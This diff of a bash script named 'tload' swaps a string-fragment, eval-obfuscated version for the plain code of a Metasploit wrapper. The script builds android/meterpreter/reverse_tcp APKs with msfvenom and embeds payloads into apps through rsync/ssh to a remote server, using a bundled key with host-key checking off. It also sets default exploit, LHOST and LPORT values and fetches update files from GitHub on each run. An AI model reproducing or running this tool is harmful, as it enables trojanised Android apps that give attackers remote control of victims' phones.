Updated

diff --git a/tload b/tload
--- a/tload
+++ b/tload
@@ -1,3 +1,157 @@
-z="
-";fFz='th a';pDz='gina';ZDz='./ms';CBz='    ';RHz='loit';tGz='R > ';WCz=' "5.';XFz=' bee';YFz='n do';JHz='t ex';Yz='athv';RGz=' wit';IBz='PT B';Rz='/raw';JBz='Y SA';YHz='ult/';SEz='$upa';BDz='es"';QDz='tup';pGz='OST=';DHz='faul';uIz='p 4';cHz='d \"';oGz='p LH';FCz='oad"';QBz='KE S';yGz='"5" ';wDz='n."';xCz='defa';hIz=' "On';rBz='--->';TBz=' THE';nCz='o be';LEz='o St';lEz='fina';oEz='ITH ';PFz=' whi';HBz='SCRI';LDz=' $o ';fBz='K"';bIz='[ $e';EIz='s $H';iHz='ostu';mDz=' pat';Jz='-Loa';IEz='i $d';rIz='e tr';wFz=' && ';xDz=' upa';qGz='t1 L';bz='er/h';pHz='sf_d';xFz='exit';fGz='om -';THz='lue ';BFz='t:/h';CJz='se t';NGz='er t';GHz='t';WGz=' "wh';cBz='OIT ';eCz='to b';TGz='pk e';oFz='"Emb';eFz='" wi';VBz='RENT';QEz='ing=';cFz='"$dp';jIz=' mor';PDz='./se';jFz='e';Oz=' -LO';kHz='\"$l';KFz='re w';NFz='ror ';VFz=' app';uGz='$p2';bCz='aspl';gDz='| [ ';NIz='hos=';Mz='dir';UGz='xten';sEz='on."';lDz=' the';KIz='pay=';ZGz='want';mGz='vers';OIz='/por';PIz='por=';ZIz='= $h';UHz='stor';vFz='t.sh';GCz=' "2.';qFz='-i $';qIz='t. P';dEz=' || ';TDz='o = ';hEz='leas';MHz='"" >';kCz=' "7.';SIz='$pay';KEz='ey -';KGz=' "Pl';gIz='else';BJz='Plea';az='mast';Tz='hubu';vBz=' thi';IFz='ath';CGz='bed';nz='rame';IHz=' "se';NEz='Host';yFz=''\''';gGz='p an';wBz='s is';TFz='ng, ';sDz='TH .';OFz='seen';xGz='"4" ';qDz='l ap';fDz=' ] |';EJz='gain';lBz=' Ins';pFz='ssh ';EBz='ion ';bGz=' pay';mHz=' >> ';eEz='[ $o';tIz='ain"';UEz='ik@$';Kz='d"';EFz='embe';ADz='valu';Fz='host';gCz='ed"';oDz=' ori';qBz='s --';sHz='"8" ';KCz='ad"';uEz='me';jz='="$H';MEz='rict';CCz=' Cre';sGz='rt1 ';BCz=' "1.';GBz='6   ';HCz=' Emb';CHz='f_de';vIz='fi';aHz='t pa';FEz='ss -';GIz='exp=';ez='pdat';RDz='elif';eHz='/pay';BBz=' "  ';kDz='nter';uFz=' '\''./';GDz='read';uDz='exte';oHz='E/.m';mBz='tall';bFz=' to ';FFz='d/$d';Nz='curl';dHz='$py\';XHz='msf_';nBz=' req';JDz=' o';iBz=' opt';BIz='ort';nHz='$HOM';yHz='p\""';uz='ad';xIz='ong ';kz='OME/';AIz='lt/p';JIz='?)';hCz=' "6.';DJz='ry a';KDz='if [';CFz='ome/';uCz=' "9.';mCz='t  t';tz=' tlo';JGz=' por';PEz='heck';PHz='_def';rGz='=$po';pIz='n se';fz='es';mIz='ues ';qEz=' ext';fCz='e us';SFz='oadi';yDz='th';aFz='aded';BEz='c -r';OHz='.msf';vDz='nsio';jHz='sed ';Gz='dir=';AEz='rsyn';EEz='ogre';rEz='ensi';nIz='have';iz='path';CIz='"9" ';kFz='p 5';aCz=' met';QHz='/exp';CDz=' "10';SBz='THAT';fHz='"7" ';iDz=' "Up';WFz=' has';ECz='Payl';MDz='= "0';lz='splo';YDz=']';BHz='/.ms';nEz='me W';hz='meta';nGz='e_tc';EDz='down';Iz='ME/T';hGz='droi';DCz='ate ';pCz=' "8.';iFz='dnam';yBz='st u';lCz='lhos';SHz=' "Va';rz='chmo';WIz='por ';nDz='h to';uBz='o if';rCz='t to';SGz='h .a';Wz='nt.c';PCz='onso';VIz=' = $';NHz='> $H';dz='rm u';VHz='p 2';tCz='used';WDz='./re';bEz='nloa';NBz=' " P';jBz='ion"';UCz=' Exi';AGz='"2" ';CEz=' -v ';DIz='[[ -';LHz='$ex\';LGz='ease';KHz='t \"';xEz='sath';YGz='you ';vCz='le w';eGz='fven';NCz='nch ';QIz=' $ex';TIz=' ] &';GGz=' hos';dIz=' "0"';cz='ost';sIz='y ag';mFz='ed" ';pEz='.apk';ZCz='ault';MCz=' Lau';yIz='choi';MFz='o er';dBz='FRAM';xHz='ortu';PBz='E MA';UFz=' you';BGz='./em';mEz='k na';gEz='Down';dGz=' p2';pBz='ment';Xz='om/S';kIz='e of';DFz='vik/';IIz='ho $';qz='oad';vz='clea';DGz='"1" ';Ez='oad/';TEz='th s';ABz='----';aGz='save';aIz='os ]';bDz='sole';SCz='lly"';XGz='ere ';MGz=' ent';ZHz=' py';cGz=' to"';xBz=' fir';Qz='ps:/';VGz='sion';tBz='st d';FGz='HOST';Dz='/T-L';ZBz='AINS';WHz='"6" ';MBz='S   ';yz=' "--';dDz='d';sBz='> Mu';UIz='& [ ';IGz='PORT';cEz='d" ]';GEz='e "s';gFz=' nam';sCz=' be ';aBz=' MET';rFz='dir/';RFz='ownl';jDz=' " E';YIz='exp ';pz='"';tHz='t/po';hDz='$o =';wIz=' "Wr';kEz='the ';oCz=' use';Bz='ce $';NDz='" ]';MIz='t ]]';xz='echo';lHz='h\""';jCz='oad ';Uz='serc';IDz='">|"';HIz='$(ec';Vz='onte';VCz='t"';DDz='. Re';ODz='then';bBz='ASPL';ICz='ed P';EGz=' "En';Cz='HOME';qHz='efau';kGz='rete';tEz=' dna';UBz=' CUR';iCz='payl';wz='r';Az='sour';WEz='me/s';wGz='.';UDz='"10"';YCz=' def';RCz='orma';Hz='"$HO';XBz='ATH ';JFz=' "If';VEz=':/ho';dFz='ath ';oBz='uire';Zz='ikKS';Lz='cd $';hHz='t lh';lFz='"emb';WBz=' "';OCz='msfc';bHz='yloa';wHz='t lp';iIz='e or';FBz='= 6.';qCz='lpor';cCz='oit ';lGz='r/re';ACz='se"';hFz='e "$';EHz='t/ex';tDz='apk ';DEz='--pr';SDz=' [ $';PGz='ompl';tFz='t -t';eDz='"upl';uHz='rt';QCz='le n';HHz=' ex';OGz='he c';HGz='t1';vHz=' lp';aEz='"dow';AHz='rm $';LBz='K K ';OBz='LEAS';fEz=' = "';wCz='ith ';QFz='le d';Pz=' htt';yEz='vik@';rDz='k WI';aDz='fcon';LFz='as n';TCz=' "4.';ZEz='p 3';hBz='lect';XIz='] &&';jEz='ter ';FHz='ploi';AJz='ce. ';nFz='] ||';sFz='key ';fIz='sflo';GFz='name';oz='work';lIz=' val';kBz=' "0.';cDz='tloa';XEz='ik/p';HEz='sh -';eBz='EWOT';gz='er/u';jGz='terp';JCz='aylo';iGz='d/me';YEz='slee';gHz=' lh';vGz='cd .';QGz='ete ';OEz='KeyC';mz='it-f';AFz='$hos';vEz='h."';KBz='THVI';DBz='Vers';FIz=' ]]';HDz=' -p ';oIz=' not';sz='d +x';rHz='lt/h';RBz='URE ';cIz='xp =';Sz='.git';LIz='/hos';HFz=' $dp';REz='no" ';eIz='lt/m';dCz='expl';LCz=' "3.';JEz='ir/k';yCz='ult ';ZFz='wnlo';wEz=' dpa';XCz=' Set';FDz='load';VDz=' ]';gBz=' "Se';iEz='e en';RIz='p = ';XDz='"3" ';YBz='CONT';
-eval "$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$z$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$Dz$Ez$az$bz$cz$z$dz$ez$fz$z$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$Dz$Ez$az$gz$ez$fz$z$hz$iz$jz$kz$hz$lz$mz$nz$oz$pz$z$Lz$Cz$Dz$qz$z$rz$sz$tz$uz$z$vz$wz$z$xz$yz$ABz$ABz$ABz$ABz$ABz$ABz$ABz$ABz$pz$z$xz$BBz$CBz$CBz$DBz$EBz$FBz$GBz$CBz$CBz$pz$z$xz$yz$ABz$ABz$ABz$ABz$ABz$ABz$ABz$ABz$pz$z$xz$BBz$CBz$HBz$IBz$JBz$KBz$LBz$MBz$CBz$pz$z$xz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$WBz$z$xz$NBz$XBz$YBz$ZBz$aBz$bBz$cBz$dBz$eBz$fBz$z$xz$yz$ABz$ABz$ABz$ABz$ABz$ABz$ABz$ABz$pz$z$xz$gBz$hBz$iBz$jBz$z$xz$kBz$lBz$mBz$nBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$wBz$xBz$yBz$ACz$z$xz$BCz$CCz$DCz$ECz$FCz$z$xz$GCz$HCz$ICz$JCz$KCz$z$xz$LCz$MCz$NCz$OCz$PCz$QCz$RCz$SCz$z$xz$TCz$UCz$VCz$z$xz$WCz$XCz$YCz$ZCz$aCz$bCz$cCz$dCz$cCz$eCz$fCz$gCz$z$xz$hCz$XCz$YCz$ZCz$aCz$bCz$cCz$iCz$jCz$eCz$fCz$gCz$z$xz$kCz$XCz$YCz$ZCz$aCz$bCz$cCz$lCz$mCz$nCz$oCz$Kz$z$xz$pCz$XCz$YCz$ZCz$aCz$bCz$cCz$qCz$rCz$sCz$tCz$pz$z$xz$uCz$MCz$NCz$OCz$PCz$vCz$wCz$xCz$yCz$ADz$BDz$z$xz$CDz$DDz$EDz$FDz$pz$z$GDz$HDz$IDz$JDz$z$KDz$LDz$MDz$NDz$z$ODz$z$PDz$QDz$z$RDz$SDz$TDz$UDz$VDz$z$ODz$z$WDz$EDz$FDz$z$RDz$SDz$TDz$XDz$YDz$z$ODz$z$vz$wz$z$Lz$hz$iz$z$ZDz$aDz$bDz$z$cDz$dDz$z$RDz$SDz$TDz$eDz$FCz$fDz$gDz$hDz$iDz$FDz$NDz$z$ODz$z$vz$wz$z$xz$jDz$kDz$lDz$mDz$nDz$lDz$oDz$pDz$qDz$rDz$sDz$tDz$uDz$vDz$wDz$z$GDz$HDz$IDz$xDz$yDz$z$AEz$BEz$CEz$DEz$EEz$FEz$GEz$HEz$IEz$JEz$KEz$LEz$MEz$NEz$OEz$PEz$QEz$REz$SEz$TEz$Yz$UEz$Fz$VEz$WEz$Yz$XEz$JCz$uz$z$YEz$ZEz$z$cDz$dDz$z$RDz$SDz$TDz$aEz$bEz$cEz$dEz$eEz$fEz$gEz$FDz$NDz$z$ODz$z$vz$wz$z$xz$NBz$hEz$iEz$jEz$kEz$lEz$qDz$mEz$nEz$oEz$pEz$qEz$rEz$sEz$z$GDz$HDz$IDz$tEz$uEz$z$xz$NBz$hEz$iEz$jEz$kEz$EDz$FDz$mDz$vEz$z$GDz$HDz$IDz$wEz$yDz$z$AEz$BEz$CEz$DEz$EEz$FEz$GEz$HEz$IEz$JEz$KEz$LEz$MEz$NEz$OEz$PEz$QEz$REz$xEz$yEz$AFz$BFz$CFz$xEz$DFz$EFz$FFz$GFz$HFz$IFz$z$xz$z$xz$z$xz$z$xz$z$xz$JFz$lDz$KFz$LFz$MFz$NFz$OFz$PFz$QFz$RFz$SFz$TFz$ODz$UFz$VFz$WFz$XFz$YFz$ZFz$aFz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$z$YEz$kFz$z$cDz$dDz$z$RDz$SDz$TDz$lFz$mFz$nFz$SDz$TDz$oFz$mFz$YDz$z$ODz$z$vz$wz$z$pFz$qFz$rFz$sFz$xEz$yEz$AFz$tFz$uFz$vFz$wFz$xFz$yFz$z$RDz$SDz$TDz$AGz$YDz$z$ODz$z$BGz$CGz$z$RDz$SDz$TDz$DGz$YDz$z$ODz$z$vz$wz$z$Lz$hz$iz$z$xz$EGz$jEz$FGz$pz$z$GDz$HDz$IDz$GGz$HGz$z$xz$EGz$jEz$IGz$pz$z$GDz$HDz$IDz$JGz$HGz$z$xz$KGz$LGz$MGz$NGz$OGz$PGz$QGz$iz$RGz$SGz$TGz$UGz$VGz$pz$z$xz$WGz$XGz$YGz$ZGz$bFz$aGz$lDz$bGz$FDz$cGz$z$GDz$HDz$IDz$dGz$z$ZDz$eGz$fGz$gGz$hGz$iGz$jGz$kGz$lGz$mGz$nGz$oGz$pGz$AFz$qGz$IGz$rGz$sGz$tGz$uGz$z$vGz$wGz$z$YEz$ZEz$z$cDz$dDz$z$RDz$SDz$TDz$xGz$YDz$z$ODz$z$vz$wz$z$xFz$z$RDz$SDz$TDz$yGz$YDz$z$ODz$z$AHz$Cz$BHz$CHz$DHz$EHz$FHz$GHz$z$vz$wz$z$xz$EGz$jEz$dCz$cCz$eCz$fCz$gCz$z$GDz$HDz$IDz$HHz$z$xz$IHz$JHz$FHz$KHz$LHz$MHz$NHz$kz$OHz$PHz$ZCz$QHz$RHz$z$xz$SHz$THz$UHz$gCz$z$YEz$VHz$z$cDz$dDz$z$RDz$SDz$TDz$WHz$YDz$z$ODz$z$AHz$Cz$Dz$Ez$XHz$xCz$YHz$iCz$qz$z$vz$wz$z$xz$EGz$jEz$iCz$jCz$eCz$fCz$gCz$z$GDz$HDz$IDz$ZHz$z$xz$IHz$aHz$bHz$cHz$dHz$MHz$NHz$kz$OHz$PHz$ZCz$eHz$FDz$z$xz$SHz$THz$UHz$gCz$z$YEz$VHz$z$cDz$dDz$z$RDz$SDz$TDz$fHz$YDz$z$ODz$z$AHz$Cz$Dz$Ez$XHz$xCz$YHz$Fz$z$vz$wz$z$xz$EGz$jEz$lCz$rCz$sCz$tCz$pz$z$GDz$HDz$IDz$gHz$z$xz$IHz$hHz$iHz$jHz$kHz$lHz$mHz$nHz$oHz$pHz$qHz$rHz$cz$z$xz$SHz$THz$UHz$gCz$z$YEz$VHz$z$cDz$dDz$z$RDz$SDz$TDz$sHz$YDz$z$ODz$z$AHz$Cz$BHz$CHz$DHz$tHz$uHz$z$vz$wz$z$xz$EGz$jEz$qCz$rCz$sCz$tCz$pz$z$GDz$HDz$IDz$vHz$z$xz$IHz$wHz$xHz$jHz$kHz$yHz$mHz$nHz$oHz$pHz$qHz$AIz$BIz$z$xz$SHz$THz$UHz$gCz$z$YEz$VHz$z$cDz$dDz$z$RDz$SDz$TDz$CIz$YDz$z$ODz$z$DIz$EIz$kz$OHz$PHz$ZCz$QHz$RHz$FIz$z$GIz$HIz$IIz$JIz$z$DIz$EIz$kz$OHz$PHz$ZCz$eHz$FDz$FIz$z$KIz$HIz$IIz$JIz$z$DIz$EIz$kz$OHz$PHz$ZCz$LIz$MIz$z$NIz$HIz$IIz$JIz$z$DIz$EIz$kz$OHz$PHz$ZCz$OIz$MIz$z$PIz$HIz$IIz$JIz$z$KDz$QIz$RIz$SIz$TIz$UIz$AFz$VIz$WIz$XIz$SDz$YIz$ZIz$aIz$wFz$bIz$cIz$dIz$VDz$z$ODz$z$vz$wz$z$nHz$oHz$pHz$qHz$eIz$fIz$uz$z$gIz$z$vz$wz$z$cDz$dDz$z$xz$hIz$iIz$jIz$kIz$lDz$YCz$ZCz$lIz$mIz$nIz$oIz$XFz$pIz$qIz$hEz$rIz$sIz$tIz$z$YEz$uIz$z$cDz$dDz$z$vIz$z$gIz$z$xz$wIz$xIz$yIz$AJz$BJz$CJz$DJz$EJz$pz$z$YEz$ZEz$z$cDz$dDz$z$vIz"
+source $HOME/T-Load/host
+dir="$HOME/T-Load"
+cd $dir
+curl -LO https://raw.githubusercontent.com/SathvikKS/T-Load/master/host
+rm updates
+curl -LO https://raw.githubusercontent.com/SathvikKS/T-Load/master/updates
+metapath="$HOME/metasploit-framework"
+cd $HOME/T-Load
+chmod +x tload
+clear
+echo "----------------------------------"
+echo "          Version = 6.9Beta       "
+echo "----------------------------------"
+echo "      SCRIPT BY SATHVIK K S       "
+echo " PLEASE MAKE SURE THAT THE CURRENT "
+echo " PATH CONTAINS METASPLOIT FRAMEWOTK"
+echo "----------------------------------"
+echo "Select option"
+echo "0. Install requirements ----->> Must do if this is first use"
+echo "1. Create Payload"
+echo "2. Embed Payload"
+echo "3. Launch msfconsole normally"
+echo "4. Exit"
+echo "5. Set default metasploit exploit to be used"
+echo "6. Set default metasploit payload to be used"
+echo "7. Set default metasploit lhost  to be used"
+echo "8. Set default metasploit lport to be used"
+echo "9. Launch msfconsole with default values"
+echo "10. Redownload"
+read -p ">|" o
+if [ $o = "0" ]
+then
+./setup
+elif [ $o = "10" ]
+then
+./redownload
+elif [ $o = "3" ]
+then
+clear
+cd $metapath
+./msfconsole
+tload
+elif [ $o = "upload" ] || [ $o = "Upload" ]
+then
+clear
+echo " Enter the path to the original apk WITH .apk extension."
+read -p ">|" upath
+rsync -r -v --progress -e "ssh -i $dir/key -o StrictHostKeyChecking=no" $upath sathvik@$host:/home/sathvik/payload
+sleep 3
+tload
+elif [ $o = "download" ] || [ $o = "Download" ]
+then
+clear
+echo " Please enter the final apk name WITH .apk extension."
+read -p ">|" dname
+echo " Please enter the download path."
+read -p ">|" dpath
+rsync -r -v --progress -e "ssh -i $dir/key -o StrictHostKeyChecking=no" sathvik@$host:/home/sathvik/embed/$dname $dpath
+echo
+echo
+echo
+echo
+echo "If there was no error seen while downloading, then you app has been downloaded to "$dpath " with a name "$dname
+sleep 5
+tload
+elif [ $o = "embed" ] || [ $o = "Embed" ]
+then
+clear
+ssh -i $dir/key sathvik@$host -t './t.sh && exit'
+elif [ $o = "2" ]
+then
+./embed
+elif [ $o = "1" ]
+then
+clear
+cd $metapath
+echo "Enter HOST"
+read -p ">|" host1
+echo "Enter PORT"
+read -p ">|" port1
+echo "Please enter the complete path with .apk extension"
+echo "where you want to save the payload to"
+read -p ">|" p2
+./msfvenom -p android/meterpreter/reverse_tcp LHOST=$host1 LPORT=$port1 R > $p2
+cd ..
+sleep 3
+tload
+elif [ $o = "4" ]
+then
+clear
+exit
+elif [ $o = "5" ]
+then
+rm $HOME/.msf_default/exploit
+clear
+echo "Enter exploit to be used"
+read -p ">|" ex
+echo "set exploit \"$ex\"" >> $HOME/.msf_default/exploit
+echo "Value stored"
+sleep 2
+tload
+elif [ $o = "6" ]
+then
+rm $HOME/T-Load/msf_default/payload
+clear
+echo "Enter payload to be used"
+read -p ">|" py
+echo "set payload \"$py\"" >> $HOME/.msf_default/payload
+echo "Value stored"
+sleep 2
+tload
+elif [ $o = "7" ]
+then
+rm $HOME/T-Load/msf_default/host
+clear
+echo "Enter lhost to be used"
+read -p ">|" lh
+echo "set lhostused \"$lh\"" >> $HOME/.msf_default/host
+echo "Value stored"
+sleep 2
+tload
+elif [ $o = "8" ]
+then
+rm $HOME/.msf_default/port
+clear
+echo "Enter lport to be used"
+read -p ">|" lp
+echo "set lportused \"$lp\"" >> $HOME/.msf_default/port
+echo "Value stored"
+sleep 2
+tload
+elif [ $o = "9" ]
+then
+[[ -s $HOME/.msf_default/exploit ]]
+exp=$(echo $?)
+[[ -s $HOME/.msf_default/payload ]]
+pay=$(echo $?)
+[[ -s $HOME/.msf_default/host ]]
+hos=$(echo $?)
+[[ -s $HOME/.msf_default/port ]]
+por=$(echo $?)
+if [ $exp = $pay ] && [ $hos = $por ] && [ $exp = $hos ] && [ $exp = "0" ]
+then
+clear
+$HOME/.msf_default/msfload
+else
+clear
+tload
+echo "One or more of the default values have not been set. Please try again"
+sleep 4
+tload
+fi
+else
+echo "Wrong choice. Please try again"
+sleep 3
+tload
+fi
